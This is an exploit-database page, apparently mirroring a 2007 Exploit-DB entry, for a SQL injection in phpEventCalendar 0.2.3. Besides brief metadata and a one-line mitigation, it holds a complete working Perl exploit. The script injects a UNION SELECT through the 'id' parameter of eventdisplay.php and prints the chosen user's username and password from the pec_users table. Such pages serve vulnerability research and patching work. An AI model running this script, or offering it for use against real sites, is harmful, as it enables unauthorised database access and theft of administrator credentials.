header-logo
Suggest Exploit
vendor:
phpEventCalendar
by:
Iron
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: phpEventCalendar
Affected Version From: <= 0.2.3
Affected Version To: <= 0.2.3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

phpEventCalendar SQL Injection Exploit

This is a SQL Injection exploit for phpEventCalendar version 0.2.3. It allows an attacker to retrieve the username and password from the database by injecting malicious SQL statements.

Mitigation:

Upgrade to a patched version of phpEventCalendar or apply relevant security patches. Ensure input validation and parameterized queries to prevent SQL Injection.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#
#	Vendor url: www.ikemcg.com
#
require LWP::UserAgent;

print "#
# phpEventCalendar <= v0.2.3 SQL Injection Exploit
# By Iron - ironwarez.info
# Thanks to Silentz for the help :)
# Greets to everyone at RootShell Security Group & dHack
#
# Example target url: http://www.target.com/phpeventcalendar/
Target url?";
chomp($target=<stdin>);
if($target !~ /^http:\/\//)
{
	$target = "http://".$target;
}
if($target !~ /\/$/)
{
	$target .= "/";
}
print "User id to retrieve name/password from? (1 = admin)";
chomp($target_id=<stdin>);
$target .= "eventdisplay.php?id=-999%20UNION%20SELECT%20username,password,password%20FROM%20pec_users%20WHERE%20uid=".$target_id;

$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;

$response = $ua->get($target);

if ($response->is_success)
{
	if($response->content =~ /<span class="display_header">(.*)<\/span>/i)
	{
		($username,$password) = split(/,/,$1);
		print "Username: ".$username;
		print "\nPassword: ".$password;
	}
	else
	{
		print "\nUnable to retrieve username/password.";
	}
}
else
{
 die "Error: ".$response->status_line;
}

# milw0rm.com [2007-07-01]

Navigation

Suggest Exploit

Services By CQR